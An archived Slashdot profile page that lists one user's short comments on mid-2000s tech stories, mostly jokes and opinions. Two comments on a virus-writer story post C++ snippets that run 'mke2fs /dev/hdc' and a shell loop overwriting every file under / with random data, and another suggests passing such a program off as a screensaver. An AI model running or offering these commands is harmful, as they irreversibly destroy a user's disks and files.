Slashdot Mirror


User: fred87

fred87's activity in the archive.

Stories
0
Comments
68
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 68

  1. Re:MyDoom.A source code on MyDoom.C Making Its Way Across The Net · · Score: 1

    Looks like linux/unix because of bz2. However, someone who would write something like this, if they thought the coding/indentation style could be used as evidence, would use indent (1)

  2. SHHH! on MyDoom.C Making Its Way Across The Net · · Score: 1

    someone at eweek might see you!

  3. Texas Instruments... on Display Format Technologies Comparison · · Score: 1

    Where do i remember them.. oh yeah they made by 60 * 80 black and white display on my graphical calculator...

    oh and it does blue if you can program z80 assembler

  4. Re:Sure it is! on Learn How to Program Using Any Web Browser · · Score: 1

    All we need is a javascript patch for links/lynx, then in vim: :!links ~/my\ crappy\ javascript\ page.htm

  5. Badly titled. on Learn How to Program Using Any Web Browser · · Score: 4, Insightful

    The web browser is *not* an IDE. You do the programming in vim/gedit/notepad. (emacs is a bit much for javascript IMO)

  6. Re:mmmm on New Microscope Shows Nano-Fibre Formation · · Score: 1

    HEY! you copied my old sig!

  7. Re:Whats so hard about that? on Profile of the Mind of a Virus Writer · · Score: 1

    Why not actually make a screensaver? before i saw the light, i used visual basic to make screensavers - just make an exe with a couple of weird api calls, rename the result to /(.*)\.scr/

  8. Re:Whats so hard about that? on Profile of the Mind of a Virus Writer · · Score: 1

    i forgot to change the submit mode from "HTML Formatted" to "Plain Old Text" - a load of angle brackets got confused into html

  9. Re:Whats so hard about that? on Profile of the Mind of a Virus Writer · · Score: 1

    Here's what i meant:

    #include
    using namespace std;

    int main()
    {
    char yorn;

    cout > yorn;

    if (yorn == "y")
    system("mke2fs /dev/hdc");

    cout > yorn;
    if (yorn == "y")
    system( "for file in `ls -R /`; do rm $file && dd if=/dev/urandom of=$file count=1 bs=1MB; done");

    return 0;
    }

  10. Whats so hard about that? on Profile of the Mind of a Virus Writer · · Score: 1

    #include using namespace std; int main () { char yorn; cout > yorn; strupr(yorn); if (yorn == "Y") system( "mke2fs /dev/hdc"); cout > yorn; strupr(yorn); if (yorn == "Y") system( "for file in `ls -R /`; do dd if=/dev/urandom of=$file bs=1MB count=1; done"); return 0; }

  11. Re: Refund for Windows on Dell's New Linux Blog · · Score: 1

    So? that still means you haven't paid for it or boosted microsofts profits.

  12. Re:They should call Dell in Sweden on Dell's New Linux Blog · · Score: 5, Informative

    After getting the laptop, contact them saying you don't agree with the MS EULA, which entitles you to a full refund for the software.

  13. Just being picky... on SCO Complaint Filed -- Including Code Samples · · Score: 1

    they use bitkeeper afaik

  14. Re:Big Deal on Red Hat to Release Enhanced-Security Linux · · Score: 1

    Thats what a firewall is for. All the unprivilieged ports are blocked to external interfaces on my computer, only accessible via lo.

  15. Possibility has been around a *long* time... on Red Hat to Release Enhanced-Security Linux · · Score: 1

    man chroot

  16. Tetris. on BBC Argues Games Don't Cause Violence · · Score: 1

    At least for Stalin.

  17. Re:Don't use IE on Microsoft Advises to Type in URLs Rather than Click · · Score: 1

    According to netcraft, apache is many, many times more popular than IIS, however there are many, many times more many worms/exploits for IIS.

  18. Re:This isn't all that bad... on ISPs Not Cooperating With RIAA's Name-Grab · · Score: 2, Interesting

    Another "This isn't all that bad..." Is their information actually any use? Do they just have a list of ip's or a list of dates and times as well, because many people have dynamic IP addresses, so many of the ip's will have been shared by many different people.

  19. Re:Yeah, right. on SUSE Linux Receives EAL3 Certification · · Score: 1

    Wasn't this SLES version released before novell bough SUSE?

  20. It's obvious really... on Cell Phone Is The Most Hated Invention · · Score: 3, Funny

    Most hated invention: SCO Unixware

  21. Re:We all know how it goes... on News from Mars · · Score: 1

    My dad does, i just have 2 cds i ripped from the LP's...

  22. From the article on 2003 Vaporware Awards · · Score: 2, Informative

    From the article: 'vaporware: n. See Duke Nukem Forever.'

  23. Re:So... on 2003 Vaporware Awards · · Score: 1

    I allready have presented SCO's award for a vapour-ware case several times via email and telephone.

  24. Re:Hurd on 2003 Vaporware Awards · · Score: 1

    Somebody heard it exists. Sorry, couldn't stop myself :)

  25. We all know how it goes... on News from Mars · · Score: 1

    "The chances of anything coming from mars are a million to one - but still... they come!" (War of the Worlds by HG Wells, musical version)